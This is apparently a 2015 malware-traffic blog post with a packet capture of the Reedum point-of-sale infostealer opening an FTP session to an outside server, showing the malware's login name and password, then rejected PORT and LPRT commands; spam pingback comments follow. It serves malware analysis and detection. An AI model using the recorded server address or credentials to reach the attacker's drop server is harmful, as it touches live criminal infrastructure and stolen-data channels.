Reedum Point of Sale Infostealer Malware using FTP to extract sensitive information Traffic Sample

By | June 19, 2015

1970-01-01 -3:-59:-35.728958 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [P.], seq 1:62, ack 1, win 65535, length 61
E..e….@.`.m…
………..X{.aP…5…220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254]

1970-01-01 -3:-59:-35.729226 IP 10.0.2.15.1047 > 109.234.159.254.21: Flags [P.], seq 1:17, ack 62, win 64179, length 16
E..8.X@….p
…m…….X{.a…?P…l…USER user37704

1970-01-01 -3:-59:-35.729275 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [.], ack 17, win 65535, length 0
E..(….@.`.m…
……….?X{.qP…|…
1970-01-01 -3:-59:-35.786678 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [P.], seq 62:141, ack 17, win 65535, length 79
E..w….@.`rm…
……….?X{.qP…kZ..331 ……………… ………… …… …………………… user37704

1970-01-01 -3:-59:-35.786950 IP 10.0.2.15.1047 > 109.234.159.254.21: Flags [P.], seq 17:31, ack 141, win 64100, length 14
E..6.Y@….q
…m…….X{.q….P..d….PASS intro22

1970-01-01 -3:-59:-35.787002 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [.], ack 31, win 65535, length 0
E..(….@.`.m…
………..X{..P…|’..
1970-01-01 -3:-59:-35.847397 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [P.], seq 141:200, ack 31, win 65535, length 59
E..c….@.`.m…
………..X{..P…….230 …………………… user37704 ………………

1970-01-01 -3:-59:-35.849326 IP 10.0.2.15.1047 > 109.234.159.254.21: Flags [P.], seq 31:39, ack 200, win 64041, length 8
E..0.Z@….v
…m…….X{……P..)….TYPE A

1970-01-01 -3:-59:-35.849379 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [.], ack 39, win 65535, length 0
E..(….@.`.m…
………..X{..P…{…
1970-01-01 -3:-59:-35.906660 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [P.], seq 200:238, ack 39, win 65535, length 38
E..N….@.`.m…
………..X{..P…….200 …… ……………….. .. A

1970-01-01 -3:-59:-35.910034 IP 10.0.2.15.1047 > 109.234.159.254.21: Flags [P.], seq 39:60, ack 238, win 64003, length 21
E..=.[@….h
…m…….X{……P…d…PORT 10,0,2,15,4,24

1970-01-01 -3:-59:-35.910108 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [.], ack 60, win 65535, length 0
E..(….@.`.m…
………..X{..P…{…
1970-01-01 -3:-59:-35.967274 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [P.], seq 238:288, ack 60, win 65535, length 50
E..Z….@.`.m…
………..X{..P…p…500 …………………… ………….. PORT

1970-01-01 -3:-59:-35.967782 IP 10.0.2.15.1047 > 109.234.159.254.21: Flags [P.], seq 60:110, ack 288, win 63953, length 50
E..Z.\@….J
…m…….X{…..!P…….LPRT 6,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,4,24

1970-01-01 -3:-59:-35.967827 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [.], ack 110, win 65535, length 0
E..(….@.`.m…
……….!X{..P…{E..
1970-01-01 -3:-59:-34.025035 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [P.], seq 288:324, ack 110, win 65535, length 36
E..L. ..@.`.m…
……….!X{..P…….500 LPRT …. ………………..

1970-01-01 -3:-59:-34.025540 IP 10.0.2.15.1047 > 109.234.159.254.21: Flags [F.], seq 110, ack 324, win 63917, length 0
E..(.]@….{
…m…….X{…..EP….r.. ABACF
1970-01-01 -3:-59:-34.025610 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [.], ack 111, win 65535, length 0
E..(.!..@.`.m…
……….EX{..P…{ ..
1970-01-01 -3:-59:-34.082857 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [F.], seq 324, ack 111, win 65535, length 0
E..(.”..@.`.m…
……….EX{..P…{…
1970-01-01 -3:-59:-34.083025 IP 10.0.2.15.1047 > 109.234.159.254.21: Flags [.], ack 325, win 63917, length 0
E..(.^@….z
…m…….X{…..FP….q…. FEE

Share Button

2 thoughts on “Reedum Point of Sale Infostealer Malware using FTP to extract sensitive information Traffic Sample

  1. Pingback: click here link click click this link good site here is the site http://www.clemsondeckbuilders.com/ www.clemsondeckbuilders.com/ clemsondeckbuilders.com/ http://www.clemsondeckbuilders.com/ www.clemsondeckbuilders.com/ clemsondeckbuilders.com/ http://www

  2. Pingback: Joseph de Saram#Rhodium

Leave a Reply

Your email address will not be published. Required fields are marked *